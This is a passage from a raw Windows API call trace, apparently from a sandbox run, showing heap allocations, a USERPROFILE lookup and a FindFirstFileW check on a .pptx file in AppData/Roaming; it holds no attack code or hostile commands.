lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0151.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0151.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0151.779] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0151.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0151.780] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0151.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0151.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0151.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0151.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0151.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0151.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0151.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0151.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0151.782] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0151.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0151.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0151.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0151.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0151.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0151.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0151.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0151.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0151.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.786] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0151.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0151.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0151.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.786] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/V7-K_kNP-.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe563b4e0, ftCreationTime.dwHighDateTime=0x1d5d41b, ftLastAccessTime.dwLowDateTime=0xe2e40150, ftLastAccessTime.dwHighDateTime=0x1d5ca77, ftLastWriteTime.dwLowDateTime=0xe2e40150, ftLastWriteTime.dwHighDateTime=0x1d5ca77, nFileSizeHigh=0x0, nFileSizeLow=0xad4f, dwReserved0=0x0, 